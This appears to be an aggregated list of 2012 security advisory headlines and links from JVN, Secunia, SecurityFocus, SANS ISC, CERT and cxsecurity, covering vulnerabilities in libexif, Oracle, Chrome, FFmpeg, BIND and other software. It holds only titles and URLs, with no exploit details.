JVNDB-2012-003097 libexif の exif-entry.c の exif_convert_utf16_to_utf8 関数におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003097.html

JVNDB-2012-003096 libexif の olympus/mnote-olympus-entry.c におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003096.html

JVNDB-2012-003095 libexif の exif-data.c の exif_data_load_data 関数におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003095.html

JVNDB-2012-003094 libexif の exif-entry.c におけるバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003094.html

JVNDB-2012-003093 libexif の exif-entry.c の exif_convert_utf16_to_utf8 関数におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003093.html

JVNDB-2012-003092 libexif の exif-entry.c の exif_entry_get_value 関数におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003092.html

JVNDB-2012-003311 複数の Apple 製品で使用される WebKit における重要な情報を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003311.html

JVNDB-2012-002693 Intel CPU で動作する 64bit OS や仮想化環境に権限昇格の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002693.html

JVNDB-2011-004380 Shibboleth OpenSAML ライブラリにおける認証を回避される脆弱性
http://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-004380.html

JVNDB-2012-003532 Oracle Database Server における SQL インジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003532.html

JVNDB-2012-004560 Oracle Database における総当りパスワード推測攻撃を実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004560.html

JVNDB-2012-003235 PostgreSQL におけるサービス運用妨害 (サーバクラッシュ) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003235.html

JVNDB-2012-002716 32-bit プラットフォーム上の Linux Kernel の i915_gem_execbuffer2 関数における整数オーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002716.html

JVNDB-2012-003022 FreeBSD の crypt_des 関数におけるアクセス権を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003022.html

JVNDB-2012-002895 Oracle MySQL および MariaDB の sql/password.c における認証を回避される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002895.html

JVNDB-2012-003275 libtiff の tiff2pdf における整数オーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003275.html

JVNDB-2012-003942 複数の Mozilla 製品の nsHTMLSelectElement::SubmitNamesValues 関数における任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003942.html

JVNDB-2012-004560 Oracle Database における総当りパスワード推測攻撃を実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004560.html

JVNDB-2012-004670 devscripts の scripts/dget.pl における任意のコマンドを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004670.html

JVNDB-2012-004591 IBM WebSphere Commerce におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004591.html

JVNDB-2012-004244 PHP の main/SAPI.c における HTTP レスポンス分割の保護メカニズムを回避される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004244.html

JVNDB-2012-004675 Red Hat Enterprise MRG で使用される Cumin における重要な情報を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004675.html

JVNDB-2012-004677 Red Hat Enterprise MRG で使用される Cumin におけるセッションキーを推測される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004677.html

JVNDB-2012-004679 Red Hat Enterprise MRG で使用される Cumin におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004683.html

JVNDB-2012-004683 Red Hat Enterprise MRG で使用される Cumin におけるクロスサイトリクエストフォージェリの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004683.html

JVNDB-2012-004684 Red Hat Enterprise MRG で使用される Cumin における Web セッションをハイジャックされる脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004684.html

JVNDB-2012-004628 Google Chrome におけるクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004628.html

JVNDB-2012-004630 Google Chrome の IPC の実装における重要な情報を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004630.html

JVNDB-2012-004668 devscripts の scripts/dscverify.pl における任意のコマンドを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004668.html

JVNDB-2012-004631 Google Chrome におけるポップアップブロッカーを回避される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004631.html

JVNDB-2012-004636 Google Chrome で使用される Microsoft Windows 7 のカーネルにおける任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004636.html

JVNDB-2012-004632 Google Chrome で使用される libxslt におけるメモリ二重解放の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004632.html

JVNDB-2012-004656 Condor の condor_startd.V6/command.cpp における重要な情報を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004656.html

JVNDB-2012-004380 ISC BIND におけるサービス運用妨害 (表明違反および named デーモンの終了) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004380.html

F5 FirePass SSL VPN Input Validation Flaw Permits Cross-Site URL Redirection Attacks
http://www.securitytracker.com/id/1027688

Cyber Security Awareness Month - Day 22: Connectors
http://isc.sans.edu/diary.html?storyid=14350

Potential Phish for Regular Webmail Accounts
http://isc.sans.edu/diary.html?storyid=14356

VU#841851 Mutiny Technology virtual appliance command injection vulnerability
http://www.kb.cert.org/vuls/id/841851

WordPress Wordfence Plugin "email" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51055/

dotProject Cross-Site Scripting and SQL Injection Vulnerabilities
http://secunia.com/advisories/51060/

SUSE update for libproxy
http://secunia.com/advisories/51048/

SUSE update for chromium
http://secunia.com/advisories/51030/

WordPress White Label CMS Plugin Cross-Site Request Forgery Vulnerability
http://secunia.com/advisories/50487/

Mutiny Unspecified Command Injection Vulnerability
http://secunia.com/advisories/51094/

Gentoo update for chromium
http://secunia.com/advisories/51079/

Gentoo update for libav
http://secunia.com/advisories/51085/

Joomla! Freestyle Support Component "prodid" SQL Injection Vulnerability
http://secunia.com/advisories/51068/

Gentoo update for bash
http://secunia.com/advisories/51086/

Debian update for tiff
http://secunia.com/advisories/51049/

Debian update for bind9
http://secunia.com/advisories/51054/

Piwik Unspecified Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51032/

IBM Proventia Management SiteProtector IEHS Cross-Site Scripting Vulnerabilities
http://secunia.com/advisories/51066/

Self Service Password Unspecified LDAP Injection Vulnerability
http://secunia.com/advisories/51064/

Turbo FTP Server 1.30.823 PORT Overflow
http://cxsecurity.com/issue/WLB-2012100194

Movable Type Pro 5.13en Cross Site Scripting
http://cxsecurity.com/issue/WLB-2012100193

DropBox iOS & Android App File Theft
http://cxsecurity.com/issue/WLB-2012100192

NetBoot SQL Injection
http://cxsecurity.com/issue/WLB-2012100191

Oracle Java SE CVE-2012-5085 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56067

Dotproject SQL Injection and Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/56152

Oracle Java SE CVE-2012-5071 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56061

Google Chrome Prior to 22.0.1229.79 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55676

Linux Kernel 'binfmt_script.c' Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55878

RETIRED: Joomla Kunena 'id' Parameter SQL Injection Vulnerability
http://www.securityfocus.com/bid/52636

hostapd CVE-2012-4445 Message Handling Denial of Service Vulnerability
http://www.securityfocus.com/bid/55826

hostapd 'hostapd.conf' Configuration File Insecure File Permissions Vulnerability
http://www.securityfocus.com/bid/54093

IBM Eclipse Help System Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/53884

ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55852

Google Chrome Prior to 22.0.1229.94 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55867

libpng 'png_formatted_warning()' Function Off-By-One Error Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/51823

Ruby CVE-2012-4522 Local File Creation Vulnerability
http://www.securityfocus.com/bid/56115

LibTIFF TIFF Image Heap Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55673

Google Chrome Prior to 21 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/54749

Google Chrome Prior to 21.0.1180.89 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55331

Google Chrome Prior to 22.0.1229.92 Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/55830

FFmpeg libavcodec 'vqavideo.c' '.vaq' File Heap Memory Corruption Vulnerability
http://www.securityfocus.com/bid/53389

FFmpeg Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/51307

FFmpeg Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/51720

GNU Bash Remote Stack Based Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/54937

bash-doc Insecure Temporary File Creation Vulnerabilities
http://www.securityfocus.com/bid/32733

TurboFTP Server 'PORT' Command Processing Stack Based Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55764

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3988 Use After Free Denial of Service Vulnerability
http://www.securityfocus.com/bid/55931

Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
http://www.securityfocus.com/bid/56171

xlockmore 'dclock' Mode Security Bypass Vulnerability
http://www.securityfocus.com/bid/56169

libsocialweb CVE-2012-4511 Non-SSL Connection Man in The Middle Vulnerability
http://www.securityfocus.com/bid/56167

Mutiny CVE-2012-3001 Command Injection Vulnerability
http://www.securityfocus.com/bid/56165

Self Service Password Unspecified LDAP Injection Vulnerability
http://www.securityfocus.com/bid/56163